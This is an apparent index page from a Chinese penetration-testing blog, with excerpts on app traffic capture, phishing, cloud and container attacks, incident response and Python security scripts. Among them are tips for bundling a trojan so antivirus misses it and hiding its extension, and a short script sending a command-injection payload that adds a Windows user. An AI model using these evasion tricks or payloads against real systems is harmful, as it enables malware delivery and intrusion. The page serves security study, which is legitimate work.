mobile 安卓逆向解题思路

问题描述：app抓包存在证书校验，常规抓包拦截网卡无法获取到数据，而证书校验分为单项证书校验，和双向证书校验。在终端模拟器执行下面命令，这里注意模拟器的版本选择7.1，9.0的版本SDK不兼容。2.科来协议分析，可以获取模拟器进程的网络通讯信息，目标通讯的ip地址。3.封包监听工具，同科来一致，监听的进程即可获取到服务器腾通讯ip信息。1.模拟器开启本地以太网代理，设置端口，bp监听以太网系统端口即可。开启外部代理工具，取消本地代理，密码为空，代理类型选择https。2.模拟器内改变配置，尝试突破。

app抓包-突破【单向证书验证&代理检测&模拟器检测】

2.杀毒软件也可能会监测文件释放过程： 捆绑器的免杀：腾讯管家杀文件捆绑器，不杀winwar压缩包，换新捆绑器，可以免杀通过腾讯管家 所以捆绑免杀的两个关注点：白名单逻辑捆绑器和木马的免杀。通过测试发现，普通文件rar进行压缩释放，安全软件不会报毒，但是如果是一些其他个人开发的捆绑压缩工具，安全软件会报毒，所以一般选用白名单的工具（不会报毒的捆绑工具）需要注意的是压缩释放后的exe顺序，将木马放在后面，点击释放运行后即可上线，但是缺陷在于，系统会提权询问释放安装运行等字眼，木马文件后缀隐藏，图标修改技巧。

文件钓鱼-后缀隐藏&文件捆绑&文件压缩释放技巧

SPF即发送方策略框架，某种邮件服务器会有自己的SPF策略设定，可以设定SPF为只允许某些主机发送邮件等，当设定后第三方就无法伪造成邮件服务器的管理员对用户下发邮件。linux下：dig -t txt qq.comwindows下：nslookup -type=txt qq.com"v=spf1 -all" （拒绝所有，表示这个域名不会发出邮件）"v=spf1 +all" （接受所有）

邮件钓鱼-邮件来源伪造-SPF绕过-setoolkit&&gohish&&swaks钓鱼

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发，具有很强的可配置性、可扩展性和易用性。提供TCP、DNS、HTTP、FILE 等各类协议的扫描，通过强大且灵活的模板，可以使用Nuclei模拟各种安全检查。提取器/匹配器：提取，匹配返回包内容，匹配出需要的目标（根据目标结果特征用匹配还是提取）http：漏洞利用核心， {{xx}}：提取目标地址的匹配信息。info：漏洞描述情况（级别，编号，标签，简介等）不允许tab，只能空格。

漏洞扫描-nuclei-poc编写

拿到shell后需要判断是否是处于docker环境中，上面图片我用了很简单的一个方法，查看ls -al下的根目录，看是否存在dockerenv文件，如果存在，则大概率为docker环境，下面还有其他的一些方法，在实战可以多个结合参考。观察到获取到docker搭建的容器shell与真实主机是有区别的，也就是我们存在于docker环境的shell中，不管在内容如何去操作，都只是在容器环境中，这个时候就需要突破容器环境，搭建容器逃逸，控制对方真实主机。后者是将整个系统打包，封装一个系统。

云安全-云原生技术架构（Docker逃逸技术-特权与危险挂载）

创建相同的桶，上传html文件访问测试（通过oss设置的备案域名访问，oss域名无效危害证明）通过put或者自己上传文件后访问，发现上传成功，可以通过对方设置的域名直接访问，造成接管，云厂商所对应的云服务包括：对象存储，云数据库，弹性计算服务（云主机），云控制台。各厂商对象存储名词：阿里云OSS，腾讯云COS，华为云OBS，亚马逊云S3。上传后尝试通过对方设置的域名信息访问，如访问成功，则成功接管。云安全厂商分类：阿里云，腾讯云，华为云，亚马逊云等。与其创建相同的oss（厂商，地区，相同名称）

云安全-对象存储安全（配置错误，域名接管，AK泄露）

k8s（Kubernetes） 是容器管理平台，用来管理容器化的应用，提供快速的容器调度、弹性伸缩等诸多功能，可以理解为容器云，不涉及到业务层面的开发。只要你的应用可以实现容器化，就可以部署在k8s 上，通过k8s对应用负载进行调度，配合hpa (Horizontal PodAutoscaling) 可以实现应用负载的弹性伸缩从而解决高并发量的问题。简单说就是：管理多台主机上的容器应用，是一个集群管理（Master节点）以往的攻击点思路通常：外网信息收集打点，漏洞攻击，获取权限，提权内网横向…

云安全-云原生k8s攻击点（8080，6443，10250未授权攻击点）

当账户配备了ram账户，即给该账户赋予了对于云上服务器的一些管理权限，一是方便了用户管理，但另一方面当存在服务器失陷且存在RAM用户权限，可能对云上服务器资产造成很大的危害。也就是说，数据库的登录需要在设置的云服务器且是配置的内网段环境中登录，在对互联网上的云资产来说，无疑是非常安全的，但可以配置公网访问添加白名单。当获取了一台云服务器权限，首先定位其厂商，再通过元数据读取到一些相关信息，如果配备了RAM，即可尝试读取临时凭证，进行云上渗透。在集群配置选项中，需要给数据库配置路由交换，专有虚拟网络。

云安全-云服务器（RAM）后渗透

上面可以看到逃逸的种类的以及其中的方法很多，但是实际环境中，是时间紧任务重，一步步的尝试逃逸难免有些费事，这里列举两种工具，CDK和check，集成了自动逃逸方法检测，CDK还集成了对应的poc实现一键逃逸，满足下列的版本时候，可以尝试该docker漏洞逃逸提权，详细的实验过程这里不作赘述，相关的操作网上也有大量的文章，但是实际的环境去逃逸，还是就事论事，会有许多的其他情况发生。CDK的自动化逃逸中包含了挂载，特权等许多的自动化利用，上述的两种逃逸类型为docker的漏洞，分别是。

云安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)

堡垒机是种网络安全设备，用于保护和管理企业内部网络与外部网络之间的访问。它作为一种中间节点，提供安全的访问控制和审计功能，用于保护内部网络免受未经授权的访问和攻击。堡垒机通常被用作跳板服务器，即堡垒机来管理和访问其他内部服务器。具有身份鉴别、帐号管理、权限控制、安全审计，身份访问控制等功能，堡垒机一般部署在内网，作为内网它所管控所有主机的安全审计系统平台，一般不会在外部网络暴露web界面。

云安全-攻防视角下如何看待堡垒机

1.窃取用户敏感信息，制作虚假网址，诱导用户输入敏感的账户信息后记录
2.携带病毒木马程序，诱导安装，使电脑中病毒木马等
3.挖矿病毒的传输，勒索病毒的传输等等

应急响应-钓鱼邮件的处理思路溯源及其反制

记一次应急响应实战分析-附加应急响应工具包

攻击者利用受害机器资源进行高强度的计算运行工作，导致受害机cpu gpu持续拉满，服务缓慢甚至宕机等。及可能存在挖矿问题，linux，windows均可存在相关问题，

应急响应-挖矿木马的清除思路

将该文件上传沙箱检测，确定为木马程序，且为内容存在条件竞争，且调用多种终端，行为非常正常文件，在Linux系统中查找并终止与指定关键词相关的进程。具体而言，它使用pgrep命令来查找与指定关键词匹配的进程ID，然后使用xargs和kill命令来终止这些进程。

应急响应-linux挖矿病毒的实战处置

windows主机cpu拉满，主机卡顿，初步判断为中了挖矿病毒通过分析JSON文件看起来像是一个配置文件，用于配置某个软件或程序的行为。其中包含了一些特殊的字段符号：cpu，opencl，pools等

应急响应-Windows挖矿实战

1.利用时间节点筛选日志行为
2.利用已知的漏洞在日志进行特征搜索，快速定位到目标ip等信息
3.后门查杀，获取后门信息，进一步定位目标信息

应急响应-web后门（中间件）的排查思路

针对主机后门windows，linux，在对方植入webshell后，需要立即响应，排查出后门位置，以及排查对外连接，端口使用情况等等
排查对外连接状态：
借助工具：pchunter 火绒剑 均可，不方便情况下cmd查看对外连接状态，进程状态，端口信息等

应急响应-主机后门webshell的排查思路（webshell，启动项，隐藏账户，映像劫持，rootkit后门）

勒索病毒入侵方式：服务弱口令，未授权，邮件钓鱼，程序木马植入，系统漏洞等
勒索病毒的危害：主机文件被加密，且几乎难以解密，对主机上的文件信息以及重要资产存在被贩卖等
勒索病毒现象：cpu占用率高，文件等应用均无法打开，打开乱码，大多数勒索windows将为常见

应急响应-勒索病毒的处理思路

文件操作之文件下载读取漏洞-CVE-2019-18371

def baiud_get():
    while not q.empty():
        bd=q.get()
        req=requests.get(bd,headers=headers)
        time.sleep(4)
        baidu=req.text
        html=etree.HTML(baidu)
        ul=html.xpath('//h3[@class="c-title t t tts-title"]')
        for  uls in ul:
            t=uls.xpath('./a[1]')
            for tt in t:
                ttt=tt.xpath('@href')
                r=requests.get(ttt[0])
                print(r.url)

python安全开发-子域名爬取&ftp爆破

在sqlmap目录下面还存在一个sqlmapapi.py的程序，sqlmap.py本身具有批量扫描的能力，常见批量扫描有使用-l参数扫描bur代理的日志目标或者-m扫描多个对象时候，推荐使用sqlmap的api接口，效率更高，sqlmapapi接口有两种使用方式，本地直接使用或者是当与本地不在一起时候，使用客户端与服务端连接使用，这两种使用方法就不做介绍了，今天介绍使用pytohn开发配合sqlmapapi接口批量扫描。

python开发-sqlmapapi接口批量扫描注入

def scan():
    while not q.empty():
        dir=q.get()
        urls=url+dir
        urls=urls.replace("\n",'')
        code=requests.get(urls).status_code
        if code==200 or code==403:
            f=open("yes.txt","a+")
            f.write(urls)
            f.close
        else:
            print(urls+'|'+str(code))
            time.sleep(1)

python安全开发-多线程目录扫描&端口扫描&子域名爆破

import requests
url_add="/?search==%00{.exec|cmd%20/c%20net%20user%20bbbbb%20123%20/add.}"
url="http://192.168.213.163/"

urls=url+url_add
print(urls)

def add():
    code=requests.get(urls).status_code
    if code ==200:
        print("yes+urls")
    else:
        print("no+urls")

if __name__ == '__main__':
    add()

python安全开发-rce命令执行&请求测试&豆 ban的信息爬取

漏洞分析：
glassfish是一款java编写的跨平台的开源的应用服务器。
与宽字节SQL注入一致，都是由于unicode编码歧义导致的。具体payload如下构造：
https://your-ip:4848/theme/META-INF

Python开发-fofa批量挖掘glassfish-任意读取漏洞

平常的盲注如果手工会很麻烦，多数情况都会借助sqlmap等相关软件跑，但是有些情况下，考虑到sqlmap的线程以及其他情况，会造成其他的影响，这里我们来简单使用python构造一个盲注脚本，低线程，高效率。

构造EXP-Python盲注脚本

Python基础入门Top50

Linux提权总结

Mysql-MOF提权

权限提升-mssql-oracle提权随笔

权限提升-mysql提权

Mysql-UDF提权

权限提升-Linux提权-suid-脏牛内核

权限提升-windows提权补丁-溢出-AT-SC-PS提权

WAF绕过-漏洞发现-漏扫绕过

WAF绕过-目录扫描-python-exp

WAF绕过-注入上传RCE利用绕过思路

WAF绕过-木马混淆免杀姿势

逻辑越权-水平垂直越权漏洞

逻辑越权-登录脆弱-支付篡改-找回类型漏洞

漏洞发现-操作系统-中间件-服务API接口小结

BurpSuite联动Xray&&Sqlmap&&抓取APP数据包

APP渗透测试和Web渗透测试基本没有区别。APP(应用程序，Application)，一般指手机软件。一个网站存在SQL注入，用PC端浏览器去访问存在SQL注入漏洞，用手机浏览器去访问一样也存在SQL注入漏洞，APP大部分漏洞的存在并不是在客户端而是在服务端。

app测试-提取-测试框架-反证书抓包

使用proxifier突破模拟器的本地代理限制，使用xp框架突破证书限制，实现联动bp抓取http协议数据包，突破虚拟的检测的简述

app测试-Proxifier突破代理&&xp框架突破证书-突破虚拟检测

app测试-小结随笔

JAVA反序列化漏洞简述

关于DOM型XSS的深入解析

最实用的正则表达式

浅谈SSRF-服务器请求伪造-Weblogice框架漏洞

对于端口的探针是一个重点关注的地方，不同的端口会有代表的不同的协议传输的服务，而对于这些一些常见的服务端口，我们需要对其进行的渗透测试做一个简要的汇总

渗透测试-应用协议安全

渗透测试-信息打点（红队工具篇）

渗透测试-信息收集打点（基础篇）

JAVA安全-JWT令牌

BurpSuite超详细使用教程

渗透DC-9-sql注入

渗透DC-8-文件共享

渗透DC-7-木马注入

渗透DC-6-命令注入

渗透DC-5-文件包含

渗透DC-4-暴力破解

渗透DC-3-内核提权-文件共享

渗透DC-2-suid提权

渗透DC-1-附suid提权笔记

内网渗透-最实用的信息收集

内网渗透-必须掌握的代理与隧道技术解答

内网渗透-最实用的横向移动总结

Strike-域渗透

CS安装教程

Windows系统备份

操作系统中间件安全加固手册

Mysql安全加固手册

IIS安全加固手册

Windows安全加固手册

中间件漏洞总结-Nginx-Tomcat

中间件漏洞总结-Apache-IIS-Nginx-Tomcat

漏洞挖掘技巧-开源程序漏洞挖掘

文件操作之文件包含解析

DNS是起ip与域名的解析的服务，通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息，它记录着你对域名或者IP的访问信息，也就是类似于日志文件，

DNSlog简介

PHP反序列化入门到上手-网鼎杯-AreUSerialz

cisp-pte真题解答

使用各种的shell工具获取到目标权限，即可进行数据操作，今天来简要分析一下目前常使用的各类shell管理工具的流量特诊，帮助蓝队同学在风险识别上快速初值

Webshell工具的流量特征分析（菜刀，蚁剑，冰蝎，哥斯拉）

2、web防护
（1）打包网站目录/var/www/html ：tar -cvf xxx.tar 打包对象/*
（2）ssh ftp 将文件拉到本地
①ssh ：scp root@192.168.16.8:/root/flag.txt /root/
②ftp：#ftp [IP地址] #get [文件名] 或者用ftp登入软件下载
（3）d盾查杀木马文件，删除文件
①：rm -rf 文件

AWD比赛中的一些防护思路

1.php弱类型的比较
2.php断言问题
3.php读取文件
4.preg_match绕过
5.sha1()函数与md5()
6.异或注入绕过
7.updatexml（）函数考点
8.命令执行绕过：https://www.cnblogs.com/iloveacm/p/13687654.html
9.源文件泄露
10.extract变量覆盖
11.strcmp漏洞

CTF-PHP常见考点

文件包含伪协议小结备忘录

通常在网站的通讯中，很多会调用api接口去方便更多信息的管理与调用，但是当使用某些api时，在开发人员未对api接口做出访问策略限制或其他的加固，会导致其他的用户发现api的时候可能会从中获取到敏感信息泄露，或者其他的sql注入等等安全问题，本文介绍三种api的利用与发现

api接口安全测试-Wsdl&Swagger&Webpack

网络安全-安全服务工程师-技能手册详细总结

浅谈文件上传漏洞

最实用的应急响应笔记思路小结

应急响应笔记思路小结

SSRF漏洞的多种绕过方式与防御手段

SSTI模板注入(Server-Side Template Injection)，通过与服务端模板的 输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的，目前CTF常见的SSTI题中，大部分是考python的。

SSTI模板注入讲解与真题实操

Redis 未授权访问漏洞与getshell（附getshell检测工具）

Log4j远程代码执行漏洞分析

权限提升-windows令牌窃取烂土豆-引号路径提权

实用的CDN绕过-CMS识别-WAF识别技术总结

fastjson是常用于解析java中的数据，将对象解析为json格式，被广泛应用于各大java项目中，首先爆出1.2.24反序列化rce，后增加了反序列化白名单的机制，不久在1.2.47版本中又被发现反序列化rce，可通过构造恶意的json反序列化rce

Fastjson v 1.2.47反序列化漏洞

获取攻击IP
IP反查定位（考虑是否为代理）
IP资产探测（masscan+nmap）、在线端口探测等
IP web的指纹识别等信息收集

记一次hw真实溯源笔记思路

教育行业edu漏洞挖掘思路小结

Burp Suite Pro v2020.12.1破解安装专业版

Struts2 基于 MVC 架构，框架结构清晰。通常作为控制器（Controller）来建立模型与视图的数据交互，用于创建企业级 Java web 应用程序。该框架多版本存在远程代码执行，

Struts2 远程代码执行漏洞

信息收集大纲

学习随笔

app测试

web安全

内网渗透

安全加固

安全开发

靶机篇

提权篇

应急响应

云安全

红队apt-钓鱼篇

渗透测试

工具篇

CTF学习

password

icon

date

type

slug

status

title

summary

表格

公告

log4j

2021年新版OWASP10有哪些变化？

渗透测试是在客户给予权限的情况下通过模拟黑客利用自动化技术和手段化技术结合对某平台网站进行入侵、以达到监测平台所存在的漏洞等一些列问题、并且提出相应的加强防护的措施、以加强web安全的一整个过程。